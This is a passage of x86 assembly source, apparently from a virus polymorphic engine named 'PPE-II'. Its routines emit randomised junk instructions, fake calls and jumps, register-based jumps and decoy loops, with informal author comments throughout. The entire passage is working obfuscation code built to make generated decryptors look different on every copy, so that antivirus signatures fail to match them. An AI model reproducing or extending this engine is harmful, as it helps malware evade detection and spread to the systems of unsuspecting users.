		movzx	eax,byte ptr [ebp+__ppe_st_items]
		call	ppe_get_rnd_range
		push	eax
		imul	eax,00000008h
		cmp	dword ptr [esi+eax],00000000h
		pop	eax
		jnz	__ppes_cnext
		imul	eax,00000008h
		add	esi,eax
	__ppes_crun:
		lodsd				;already generated byte...
		lodsd
		add	eax,ebp
		call	eax
		mov	dword ptr [esi-8],1	;already generated flag
		dec	byte ptr [ebp+__ppe_st_flags]
		jz	__ppes_ccmp
		cmp	byte ptr [ebp+__ppe_st_flags+01h],00h
		jz	__ppes_cnext
		jmp	__ppes_crun
	__ppes_ccmp:
		mov	esi,[ebp+__ppe_st_o_table]
		movzx	eax,byte ptr [ebp+__ppe_st_items]
		imul	eax,00000008h
		add	esi,eax
		dec	ecx
		jnz	__ppes_choose

		; finishing (PPE-II)...
		mov	eax,edi
		sub	eax,[ebp+mem_address]
		mov	[ebp+poly_finish],eax
		popa
		ret

;ÄÄÄ´ polymorphic garbages PPE-II ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ÄÄÄ´ generate some garbages code ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This main function generates garbages from my great table
		;Function can be recursived but it  cannot  generate copro
		;garbages yet. You can	set (garbage_style) if you want to
		;generate unmodify flags instructions.
		;
gen_garbage:

		inc	byte ptr [ebp+recursive_level]
		cmp	byte ptr [ebp+recursive_level],04h
		jae	__gg_exit

		; are registers full ?
		cmp	byte ptr [ebp+used_regs],0EFh
		jz	__gg_exit

		pusha
		mov	eax,00000004h
		call	ppe_get_rnd_range
		inc	eax
		mov	ecx,eax
	__gg_loop:
		push	ecx

		; have I use unmodify flags instructions ?
		cmp	byte ptr [ebp+garbage_style],USED_FLAGS
		jnz	__ggl_flags
		mov	eax,(end_no_flags - tbl_no_flags) / 02h
		call	ppe_get_rnd_range
		lea	esi,[ebp+tbl_no_flags+eax*02h]
		lodsb
		call	ppe_get_rnd_range
		add	al,[esi]
		call	__gg_test
		jc	__gg_finish
		lea	esi,[ebp+tbl_garbage+04h*eax]
		mov	eax,[esi]
		jmp	__gg_jump

	__ggl_flags:
		mov	eax,(end_garbage - tbl_garbage) / 04h
		call	ppe_get_rnd_range
		call	__gg_test
		jc	__gg_finish
		lea	esi,[ebp+tbl_garbage+eax*04h]
		lodsd
	__gg_jump:
		add	eax,ebp
		call	eax
	__gg_finish:
		pop	ecx
		loop	__gg_loop

		mov	[esp],edi
		popa

	__gg_exit:
		dec	byte ptr [ebp+recursive_level]
		ret

	__gg_test:
		clc
		push	eax
		test	byte ptr [ebp+garbage_style],not USED_BASED
		jnz	__ggt_success
		cmp	eax,__garbage_based_num
		jb	__ggt_success
	__ggt_failed:
		stc
	__ggt_success:
		pop	eax
		ret

		; gnerate garbage which will not modify flags (mov,stack...)
gen_garbage_no_flags:
		push	ax
		mov	al,[ebp+garbage_style]
		mov	byte ptr [ebp+garbage_style],USED_FLAGS
		call	gen_garbage
		mov	byte ptr [ebp+garbage_style],al
		pop	ax
		ret

;ÄÄÄ´ generate mov reg,imm ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

g_movreg32imm:	call	ppe_get_empty_reg	;mov empty_reg32,imm
		mov	al,0b8h
		or	al,byte ptr [ebx]
		stosb
		call	ppe_get_rnd32
		stosd
		ret

g_movreg16imm:	call	ppe_get_empty_reg	;mov empty_reg16,imm
		mov	ax,0B866h
		or	ah,byte ptr [ebx]
		stosw
		call	ppe_get_rnd32
		stosw
		ret

g_movreg8imm:	call	ppe_get_empty_reg	;mov empty_reg8,imm
		test	byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
		jnz	a_movreg8imm
		call	ppe_get_rnd32
		mov	al,0B0h
		or	al,byte ptr [ebx]
		mov	edx,eax
		call	ppe_get_rnd32
		and	ax,0004h
		or	ax,dx
		stosw
a_movreg8imm:	ret

;ÄÄÄ´ generate mov reg,reg ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

g_movregreg32:	call	ppe_get_reg		;mov empty_reg32,reg32
		push	ebx
		call	ppe_get_empty_reg
		pop	edx
		cmp	ebx,edx
		jz	g_movregreg32		;mov ecx,ecx ? etc. ?
c_movregreg32:	mov	ah,byte ptr [ebx]
		shl	ah,3
		or	ah,byte ptr [edx]
		or	ah,0C0h
		mov	al,8Bh
		stosw
		ret

g_movregreg16:	call	ppe_get_reg		;mov empty_reg16,reg16
		push	ebx
		call	ppe_get_empty_reg
		pop	edx
		cmp	ebx,edx
		jz	g_movregreg16		;mov si,si ? etc. ?
		mov	al,66h
		stosb
		jmp	c_movregreg32

g_movregreg8:	call	ppe_get_reg		;mov empty_reg8,reg8
		test	byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
		jnz	g_movregreg8
		push	ebx
		call	ppe_get_empty_reg
		pop	edx
		test	byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
		jnz	a_movregreg8
		cmp	ebx,edx
		jz	g_movregreg8		;mov al,al ? etc. ?
		mov	ah,byte ptr [ebx]
		shl	ah,3
		or	ah,byte ptr [edx]
		or	ah,0C0h
		mov	al,8Ah
		push	eax
		call	ppe_get_rnd32
		pop	edx
		and	ax,2400h
		or	ax,dx
		stosw
a_movregreg8:	ret

;ÄÄÄ´ generate add/sub/xor/and/adc/sbb/or reg,imm ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

g_mathreg32imm: mov	al,81h			;math reg32,imm
		stosb
		call	ppe_get_empty_reg
		call	__do_math_work
		stosd
		ret

g_mathreg16imm: mov	ax,8166h		;math reg16,imm
		stosw
		call	ppe_get_empty_reg
		call	__do_math_work
		stosw
		ret

g_mathreg8imm:	call	ppe_get_empty_reg	;math reg8,imm
		test	byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
		jnz	a_mathreg8imm
		mov	al,80h
		stosb
		call	__do_math_work
		stosb
		and	ah,04h
		or	byte ptr [edi-2],ah
a_mathreg8imm:	ret

	__do_math_work: 			;select math operation
		mov	eax,end_math_imm - tbl_math_imm
		call	ppe_get_rnd_range
		lea	esi,dword ptr [ebp+tbl_math_imm+eax]
		lodsb
		or	al,byte ptr [ebx]
		stosb
		call	ppe_get_rnd32
		ret

;ÄÄÄ´ generate push reg + garbage + pop reg ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

g_push_g_pop:	call	ppe_get_reg		;	push rnd_reg
		mov	al,50h			;	--garbage--
		or	al,byte ptr [ebx]	;	--garbage--
		stosb				;	pop empty_reg
		call	gen_garbage
		call	ppe_get_empty_reg
		mov	al,58h
		or	al,byte ptr [ebx]
		stosb
		ret

;ÄÄÄ´ generate call without return ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

g_call_cont:	mov	al,0E8h 		;	call	__here
		stosb				;	--rnd data--
		push	edi			;	--rnd data--
		stosd				;__here:
		call	ppe_gen_rnd_block	;	pop empty_reg
		pop	edx
		mov	eax,edi
		sub	eax,edx
		sub	eax,00000004h
		mov	[edx],eax
		call	gen_garbage_no_flags
		call	ppe_get_empty_reg
		mov	al,58h
		or	al,byte ptr [ebx]
		stosb
		ret

;ÄÄÄ´ generate unconditional jump ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

g_jump_u:	mov	al,0E9h 		;	jmp	__here
		stosb				;	--rnd data--
		push	edi			;	--rnd data--
		stosd				;__here:
		call	ppe_gen_rnd_block	;	--next code--
		pop	edx
		mov	eax,edi
		sub	eax,edx
		sub	eax,00000004h
		mov	dword ptr [edx],eax
		ret

;ÄÄÄ´ generate conditional jump ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

g_jump_c:	call	ppe_get_rnd32		;	jX __here
		and	ah,0Fh			;	--garbage--
		add	ah,80h			;	--garbage--
		mov	al,0Fh			;__here:
		stosw				;	--next code--
		push	edi
		stosd
		call	gen_garbage_no_flags
		pop	edx
		mov	eax,edi
		sub	eax,edx
		sub	eax,00000004h
		mov	dword ptr [edx],eax
		ret

;ÄÄÄ´ generate movzx,movsx reg32/16,reg16/8 ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

g_movzx_movsx_32:				;movzx/movsx reg32,reg16
		call	ppe_get_rnd32
		mov	ah,0B7h
		and	al,1
		jz	__d_movzx32
		mov	ah,0BFh
	__d_movzx32:
		mov	al,0Fh
		stosw
		call	ppe_get_reg
		push	ebx
		call	ppe_get_empty_reg
		pop	edx
		mov	al,byte ptr [ebx]
		shl	al,3
		or	al,0C0h
		or	al,byte ptr [edx]
		stosb
		ret

g_movzx_movsx_16:				;movzx/movsx reg16,reg8
		mov	al,66h
		stosb

g_movzx_movsx_8:				;movzx/movsx reg32,reg8
		call	ppe_get_rnd32
		mov	ah,0B6h
		and	al,1
		jz	__d_movzx32
		mov	ah,0BEh
		jmp	__d_movzx32

;ÄÄÄ´ generate rol/ror/rcl/rcr/shl/shr/sar reg,imm ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

g_rotate_shift32:				;(r/s) reg32,imm8
		mov	al,0C1h
		stosb
		call	ppe_get_empty_reg
		call	__do_rs_work
		stosb
		ret

g_rotate_shift16:				;(r/s) reg16,imm8
		mov	al,66h
		stosb
		jmp	g_rotate_shift32

g_rotate_shift8:
		call	ppe_get_empty_reg	;(r/s) reg8,imm8
		test	byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
		jnz	a_rotate_shift8
		mov	al,0C0h
		stosb
		call	__do_rs_work
		stosb
		and	ah,04h
		or	byte ptr [edi-2],ah
a_rotate_shift8:ret

	__do_rs_work:				;select r/s operation
		mov	eax,end_rs_imm - tbl_rs_imm
		call	ppe_get_rnd_range
		lea	esi,dword ptr [ebp+tbl_rs_imm+eax]
		lodsb
		or	al,byte ptr [ebx]
		stosb
		call	ppe_get_rnd32
		ret

;ÄÄÄ´ generate rol/ror/rcl/rcr/shl/shr/sar reg,reg8 ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

g_rs_reg32reg8: 				;(r/s) reg32,reg8
		mov	al,0D3h
		stosb				;in fact, reg8 is always CL
		call	ppe_get_empty_reg	;because CPU allows only
		call	__do_rs_work		;this reg8
		ret

g_rs_reg16reg8: 				;(r/s) reg16,reg8 (CL)
		mov	al,66h
		stosb
		jmp	g_rs_reg32reg8

g_rs_reg8reg8:					;(r/s) reg8,reg8 (CL)
		call	ppe_get_empty_reg
		test	byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
		jnz	a_rs_reg8reg8
		mov	ax,0D266h
		stosw
		call	__do_rs_work
		and	ah,04h
		or	byte ptr [edi-1],ah
a_rs_reg8reg8:	ret

;ÄÄÄ´ generate bt/bts/btr/btc reg32/16,(reg/imm)32/16 ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

g_bt_regreg32:	mov	al,0Fh
		stosb
		call	__do_bt_work
		ret

g_bt_regreg16:	mov	ax,0F66h
		stosw
		call	__do_bt_work
		ret

	__do_bt_work:
		mov	eax,end_bt_reg - tbl_bt_reg
		call	ppe_get_rnd_range
		lea	esi,[ebp+tbl_bt_reg+eax]
		lodsb
		stosb
		call	ppe_get_empty_reg
		push	ebx
		call	ppe_get_reg
		pop	edx
		mov	al,byte ptr [ebx]
		shl	al,3
		or	al,0C0h
		or	al,byte ptr [edx]
		stosb
		ret

g_bit_test32:	mov	ax,0BA0Fh
		stosw
		call	__do_bit_test_work
		ret

g_bit_test16:	mov	al,66h
		stosb
		jmp	g_bit_test32

	__do_bit_test_work:
		mov	eax,end_bt_imm - tbl_bt_imm
		call	ppe_get_rnd_range
		lea	esi,[ebp+tbl_bt_imm+eax]
		call	ppe_get_empty_reg
		lodsb
		or	al,byte ptr [ebx]
		stosb
		call	ppe_get_rnd32
		stosb
		ret

;ÄÄÄ´ generate add/sub/xor/and/adc/sbb/or reg,reg ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

g_mathregreg32: 				;math reg32,reg32
		call	__do_math_regreg_work
		ret

g_mathregreg16: 				;math reg16,reg16
		mov	al,66h
		stosb
		jmp	g_mathregreg32

g_mathregreg8:					;math reg8,reg8
		call	ppe_get_reg
		test	byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
		jnz	g_mathregreg8
		push	ebx
		call	ppe_get_empty_reg
		pop	edx
		test	byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
		jnz	a_mathregreg8
		mov	eax,end_math_reg - tbl_math_reg
		call	ppe_get_rnd_range
		lea	esi,[ebp+tbl_math_reg+eax]
		lodsb
		dec	al
		stosb
		mov	al,byte ptr [ebx]
		shl	al,3
		or	al,byte ptr [edx]
		or	al,0C0h
		stosb
		call	ppe_get_rnd32
		and	al,24h
		or	byte ptr [edi-1],al
a_mathregreg8:	ret

	__do_math_regreg_work:
		mov	eax,end_math_reg - tbl_math_reg
		call	ppe_get_rnd_range
		lea	esi,[ebp+tbl_math_reg+eax]
		lodsb
		stosb
		call	ppe_get_reg
		push	ebx
		call	ppe_get_empty_reg
		pop	edx
		mov	al,byte ptr [ebx]
		shl	al,3
		or	al,0C0h
		or	al,byte ptr [edx]
		stosb
		ret

;ÄÄÄ´ set reg8 by flag ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

g_set_byte:	call	ppe_get_empty_reg
		test	byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
		jnz	a_set_byte
		mov	al,0Fh
		stosb
		mov	eax,00000010h		;we have 16 opcodes, haha..
		call	ppe_get_rnd_range
		or	al,90h			;seta , setae, setb , setbe
		stosb				;sete , setg , setge, setl
		mov	al,byte ptr [ebx]	;setle, setne, setno, setnp
		or	al,0C0h 		;setns, seto , setp , sets
		stosb
		call	ppe_get_rnd32
		and	al,04h
		or	byte ptr [edi-1],al
a_set_byte:	ret

;ÄÄÄ´ generate garbage + loop ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

g_loop:

		; we can't be recursived because ECX is only for one LOOP
		cmp	byte ptr [ebp+recursive_level],01h
		jnz	a_loop

		; does ECX free ?
		test	byte ptr [ebp+used_regs],00000010b
		jnz	a_loop

		; generate ECX like counter
		mov	eax,00000030h		;future ECX to loop
		call	ppe_get_rnd_range
		add	eax,2
		mov	bl,00000001b		;write to ECX
		call	ppe_crypt_value

		; we don't want to change ECX
		or	byte ptr [ebp+used_regs],00000010b

		push	edi			;total garbages in bytes
		call	gen_garbage		;to calculate loop
		pop	eax
		sub	eax,edi
		sub	eax,2			;loop has two bytes

		mov	ah,0E2h 		;loop identification
		xchg	ah,al
		stosw

		; enable ECX
		and	byte ptr [ebp+used_regs],11111101b
a_loop: 	ret

;ÄÄÄ´ generate reg + garbage + dec reg + jnz reg ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;   ÀÄÄÄÄÄÄÄÄÄÄÄ sado-maso function ÄÄÄÄÄÄÄÄÄÄÄÙ

		g_lj_reg	db	?	;0=8bit, 1=16bit, 2=32bit
		g_lj_reg_past	db	?	;0=low, 1=high (8BIT only)

g_loop_jump:

		; we can't be recursived because ECX is only for one LOOP_JUMP
		cmp	byte ptr [ebp+recursive_level],01h
		jnz	a_loop_jump

		; select a free register
		call	ppe_get_empty_reg
		mov	byte ptr [ebp+g_lj_reg],00h		;8 bit ...
		test	byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
		jnz	__g_lj_no_8bit
		mov	eax,00000001h				;hi, lo ?
		call	ppe_get_rnd_range
		mov	byte ptr [ebp+g_lj_reg_past],al
		jmp	__g_lj_okay

		; choose between reg16 and reg32
	__g_lj_no_8bit:
		mov	eax,00000002h		;reg16 or reg32 ?
		call	ppe_get_rnd_range
		inc	eax
		mov	byte ptr [ebp+g_lj_reg],al

	__g_lj_okay:
		push	ebx
		mov	eax,00000030h		;how many to looping ?
		call	ppe_get_rnd_range
		add	eax,2
		mov	bl,byte ptr [ebx]	;used reg
		call	ppe_crypt_value

		pop	ebx
		push	ebx
		mov	al,byte ptr [ebx]	;disable register
		call	__reg_to_bcd
		or	byte ptr [ebp+used_regs],ah

		push	edi
		call	gen_garbage
		pop	ecx

		mov	ax,4866h		;dec (reg16-clone)
		or	ah,byte ptr [ebx]
		cmp	byte ptr [ebp+g_lj_reg],00h
		jz	__g_lj_dec_8bit
		cmp	byte ptr [ebp+g_lj_reg],02h
		jz	__g_lj_dec_32bit
		stosb
	__g_lj_dec_32bit:
		xchg	ah,al
		stosb
		jmp	__g_lj_dec_finish
	__g_lj_dec_8bit:
		mov	ax,0C8FEh		;dec (reg8)
		or	ah,byte ptr [ebx]	;certain reg
		cmp	byte ptr[ebp+g_lj_reg_past],01h
		jz	__g_lj_dec_8bit_high
		stosw
		jmp	__g_lj_dec_finish
	__g_lj_dec_8bit_high:
		and	ah,24h
		stosw

	__g_lj_dec_finish:
		call	gen_garbage_no_flags
		pop	ebx

		mov	al,byte ptr [ebx]	;certain reg
		call	__reg_to_bcd
		not	ah
		and	byte ptr [ebp+used_regs],ah

		mov	ax,850Fh		;JNZ identification
		stosw

		mov	eax,ecx
		sub	eax,edi
		sub	eax,4
		stosd

a_loop_jump:	ret

;ÄÄÄ´ generate reg32 + call reg32 + rnd_block + pop reg32 ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function can generate CALL reg32 which will be gene-
		;rated by <ppe_crypt_value>.
		;
		g_cr32_reg	db	?
		g_cr32_full	db	?	;0=g_return,1=call,2=jump
		g_cr32_jump	dd	?	;address of CALL instruction
		;
g_call_reg32:

		mov	byte ptr [ebp+g_cr32_full],01h
b_call_reg32:	mov	dword ptr [ebp+g_cr32_jump],00000000h

		; test, if global index reg is generated
		cmp	byte ptr [ebp+gl_index_reg],-1
		jz	a_call_reg32

		; do not recursived - because it's few registers
		cmp	byte ptr [ebp+recursive_level],01h
		jnz	a_call_reg32

		; garbage only in main-poly loop
		cmp	dword ptr [ebp+__pllg_memory],00000000h
		jnz	a_call_reg32

		; save used-regs
		mov	al,[ebp+used_regs]
		push	ax

		; select an empty register
		call	ppe_get_empty_reg
		movzx	ebx,byte ptr [ebx]
		mov	byte ptr [ebp+g_cr32_reg],bl

		; calculate size of rnd_block
		mov	eax,00000030h
		call	ppe_get_rnd_range
		add	eax,00000005h		;damn, fucking BUG !!
		push	eax			;save it for later use
		jmp	d_call_reg32
c_call_reg32:	mov	byte ptr [ebp+g_cr32_full],00h
		mov	cl,[ebp+used_regs]
		push	cx
		mov	bl,byte ptr [ebx]
		mov	byte ptr [ebp+g_cr32_reg],bl
d_call_reg32:	call	ppe_crypt_value 	;ebx is full
		movzx	eax,byte ptr [ebp+g_cr32_reg]
		lea	ebx,[ebp+tbl_regs+02h*eax]
		call	__reg_to_bcd
		or	byte ptr [ebp+used_regs],ah
		call	gen_garbage_no_flags	;uaaahh
		call	__copro_fix_delta	; + global index register
		call	gen_garbage_no_flags

		; for <ppe_get_return> we don't want to set right size
		cmp	byte ptr [ebp+g_cr32_full],00h
		jz	e_call_reg32

		; set the right size
		mov	ebx,edi
		add	ebx,2+6 		; + call reg32 + (add/sub)
		sub	ebx,[ebp+poly_start]
		mov	eax,00000002h
		call	ppe_get_rnd_range
		or	al,al
		jz	__cr32_add
		neg	ebx
		mov	ax,0E881h		;sub reg32,imm32 id
		jmp	__cr32_finish
	__cr32_add:
		mov	ax,0C081h		;add reg32,imm32 id
	__cr32_finish:
		or	ah,byte ptr [ebp+g_cr32_reg]
		stosw
		mov	eax,ebx
		stosd
e_call_reg32:
		; now, write CALL reg32 instruction
		mov	ax,0D0FFh
		or	ah,byte ptr [ebp+g_cr32_reg]
		stosw
		mov	[ebp+g_cr32_jump],edi

		cmp	byte ptr [ebp+g_cr32_full],00h
		jz	f_call_reg32

		pop	ecx			;rnd_block length
		call	ppe_gen_rnd_fill	;ecx is full

		cmp	byte ptr [ebp+g_cr32_full],02h
		jz	f_call_reg32

		; and we must put value from stack via POP reg32
		call	gen_garbage_no_flags	;uaaahh...
		mov	al,58h
		or	al,byte ptr [ebp+g_cr32_reg]
		stosb
f_call_reg32:
		; restore used_regs
		pop	ax
		mov	[ebp+used_regs],al
a_call_reg32:	ret

;ÄÄÄ´ generate reg32 + jump reg32 + rnd_block ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

g_jump_reg32:

		mov	byte ptr [ebp+g_cr32_full],02h

		; write CALL reg32 garbage
		call	b_call_reg32
		cmp	dword ptr [ebp+g_cr32_jump],00000000h
		jz	a_jump_reg32

		; rewrite CALL reg32 --> JMP reg32
		mov	eax,[ebp+g_cr32_jump]
		add	byte ptr [eax-1],10h	;CALL reg32 -> JMP reg32

a_jump_reg32:	ret

;ÄÄÄ´ generate rep/repnz + cmps/lods/stos/scas/movs ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;   ÀÄÄÄÄÄÄÄÄÄÄÄÄÄ sado-maso function ÄÄÄÄÄÄÄÄÄÄÄÄÙ

		;---------------------------------------------------------
		;Welcome to my popular function. I think  any  comment	is
		;needless - because this  function is easy  to understand.
		;So, If u don't believe me, I'll show you some	functionz:
		;  * __gr_make_esi   ---   generate source
		;  * __gr_make_edi   ---   generate destination or source
		;  * __gr_make_ecx   ---   generate counter
		;
		;...easy to understand...
		;
g_repeat:

		; test, if global index register is generated
		cmp	byte ptr [ebp+gl_index_reg],-1
		jz	a_repeat

		; i must be far then about USED_MEMORY bytes
		call	__gr_where_in_mem
		jc	a_repeat

		; garbage use only in main-poly loop
		cmp	dword ptr [ebp+__pllg_memory],00000000h
		jnz	a_repeat

		; register ECX must be free
		test	byte ptr [ebp+used_regs],00000010b
		jnz	a_repeat

		; does ESI free ?
		test	byte ptr [ebp+used_regs],01000000b
		jnz	__gr_part_2

		; does EDI free ?
		test	byte ptr [ebp+used_regs],10000000b
		jnz	__gr_lods

		; all cmps/lods/stos/scas/movs, wow !
		mov	eax,(end_repeat - tbl_repeat) / 04h
		call	ppe_get_rnd_range
		lea	esi,[ebp+tbl_repeat+eax*04h]
		lodsd
		add	eax,ebp
		call	eax
		jmp	a_repeat

	__gr_part_2:
		; must be EDI free ..
		test	byte ptr [ebp+used_regs],10000000b
		jnz	a_repeat

		; only stos/scas ...
		mov	eax,00000002h
		call	ppe_get_rnd_range
		or	al,al
		jz	__gr_stos
		jmp	__gr_scas

	__gr_cmps:
		call	__gr_make_esi		;new esi to ebx
		call	__gr_make_edi		;new edi to ecx
		call	__gr_change

		push	ecx
		mov	eax,ebx
		mov	bl,00000110b		;esi register
		call	ppe_crypt_value
		lea	ebx,[ebp+tbl_regs+6*2]
		call	__copro_fix_delta
		or	byte ptr [ebp+used_regs],01000000b
		pop	eax
		mov	bl,00000111b		;edi register
		call	ppe_crypt_value
		lea	ebx,[ebp+tbl_regs+7*2]
		call	__copro_fix_delta
		or	byte ptr [ebp+used_regs],10000000b

		call	__gr_crypt_ecx		;ecx register
		call	__gr_make_rep		;rep or repnz ?
		mov	al,0A6h
		stosb
		and	byte ptr [ebp+used_regs],00111111b
		ret

	__gr_lods:
		; register EAX must be free
		test	byte ptr [ebp+used_regs],00000001h
		jnz	__gr_flods
		call	__gr_make_esi

		mov	eax,ebx
		mov	bl,00000110b
		call	ppe_crypt_value
		lea	ebx,[ebp+tbl_regs+6*2]
		call	__copro_fix_delta
		or	byte ptr [ebp+used_regs],01000000b

		call	__gr_crypt_ecx
		call	__gr_make_rep
		mov	al,0ACh
		stosb
		and	byte ptr [ebp+used_regs],10111111b
	__gr_flods:
		ret

	__gr_stos:
		call	__gr_make_edi

		mov	eax,ecx
		mov	bl,00000111b
		call	ppe_crypt_value
		lea	ebx,[ebp+tbl_regs+7*2]
		call	__copro_fix_delta
		or	byte ptr [ebp+used_regs],10000000b

		call	__gr_crypt_ecx
		call	__gr_make_rep
		mov	al,0AAh
		stosb
		and	byte ptr [ebp+used_regs],01111111b
		ret

	__gr_scas:
		call	__gr_make_edi
		or	byte ptr [ebp+used_regs],10000000b

		mov	eax,ecx
		mov	bl,00000111b
		call	ppe_crypt_value
		lea	ebx,[ebp+tbl_regs+7*2]
		call	__copro_fix_delta

		call	__gr_crypt_ecx
		call	__gr_make_rep
		mov	al,0AEh
		stosb
		and	byte ptr [ebp+used_regs],01111111b
		ret

	__gr_movs:
		call	__gr_make_esi
		call	__gr_make_edi
		call	__gr_change

		push	ecx
		mov	eax,ebx
		mov	bl,000000110b
		call	ppe_crypt_value
		lea	ebx,[ebp+tbl_regs+6*2]
		call	__copro_fix_delta
		or	byte ptr [ebp+used_regs],01000000b
		pop	eax
		mov	bl,000000111b
		call	ppe_crypt_value
		lea	ebx,[ebp+tbl_regs+7*2]
		call	__copro_fix_delta
		or	byte ptr [ebp+used_regs],10000000b

		call	__gr_crypt_ecx
		call	__gr_make_rep
		mov	al,0A4h
		stosb
		and	byte ptr [ebp+used_regs],00111111b
		ret

	__gr_make_rep:
		mov	bx,0F2F3h		;repnz, rep
		mov	eax,00000002h
		call	ppe_get_rnd_range
		xchg	eax,ebx
		or	bl,bl
		jz	__gr_make_repnz
		stosb
		ret
	__gr_make_repnz:
		xchg	ah,al
		stosb
		ret

	__gr_crypt_ecx:
		mov	eax,30
		call	ppe_get_rnd_range
		mov	bl,00000001b		;ecx register
		call	ppe_crypt_value
		ret

	__gr_make_esi:
		mov	eax,0000000Ah		;esi start
		call	ppe_get_rnd_range
		mov	ebx,eax
		sub	ebx,edi
		add	ebx,[ebp+poly_start]
		ret

	__gr_make_edi:
		mov	eax,000000Ah		;edi start
		call	ppe_get_rnd_range
		mov	ecx,eax
		sub	ecx,edi
		add	ecx,[ebp+poly_start]
		ret

	__gr_change:
		mov	eax,00000002h		;change esi and edi ?
		call	ppe_get_rnd_range
		or	al,al
		jz	__gr_change_no
		xchg	ebx,ecx
	__gr_change_no:
		ret

	__gr_where_in_mem:
		mov	eax,[ebp+poly_start]
		sub	eax,edi
		neg	eax
		cmp	eax,USED_MEMORY
a_repeat:	ret

;ÄÄÄ´ generate push value(32/16)/garbage/pop reg32 ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

g_pushpop_value:

		; value32 OR value16 ?
		call	ppe_get_rnd32		;save dword or word ?
		and	al,1
		jnz	__ppv_push16

		; short or long value ?
		call	ppe_get_rnd32
		and	al,1
		jnz	__ppv_push32_short

		; long value
		mov	al,68h			;save: PUSH 11223344h
		stosb				;code:	68  44332211
		call	ppe_get_rnd32
		stosd
		jmp	__ppv_finish32
	__ppv_push32_short:
		call	ppe_get_rnd32		;save: PUSH 00000009h
		mov	al,6Ah			;code:	6A     09
		stosw
		jmp	__ppv_finish32
	__ppv_push16:
		call	ppe_get_rnd32
		and	al,1
		jnz	__ppv_push16_short

		; long short-value
		mov	ax,6866h
		stosw
		call	ppe_get_rnd32
		stosw
		jmp	__ppv_finish16
	__ppv_push16_short:
		mov	ax,6A66h
		stosw
		call	ppe_get_rnd32
		stosb
		jmp	__ppv_finish16

		; time to POP value
	__ppv_finish32:
		call	gen_garbage		;POP reg32
		call	ppe_get_empty_reg
		mov	al,58h
		or	al,byte ptr [ebx]
		stosb
		jmp	__ppv_finish
	__ppv_finish16:
		call	gen_garbage		;POP reg16
		call	ppe_get_empty_reg
		mov	ax,5866h
		or	ah,byte ptr [ebx]
		stosw

	__ppv_finish:
		ret

;ÄÄÄ´ function to crypt a random value to reg32 ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

g_crypt_value:

		call	ppe_get_empty_reg
		mov	bl,al
		call	ppe_get_rnd32
		call	ppe_crypt_value
		ret

;ÄÄÄ´ function to simulate end of encode-loop ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

		;---------------------------------------------------------
		;This function can generate "destination"  compare  like a
		;bafflement. So, this garbage generate this code:
		;
		;	CALL	    __pos_1		;any garbages
		;	<rnd_data>			;typical CALL rnd_data
		;  __i: JMP	    __compare_back	;  NEW JUMP
		;	<rnd_data>			;typical CALL rnd_data
		;  __pos_1:
		;	<next_code>			;loop,next_index...
		;	DEC	    reg32		;typical CMP instruction
		;	<garbages>
		;	CMP	    reg32,reg32 	;compare registers
		;	<garbages - no_flags>		;no_flags garbages
		;	JNZ	    __i 		;typical CMP c-jump
		;	<garbages>
		;  __compare_back:			;come back and continue
		;	<next_code>
		;
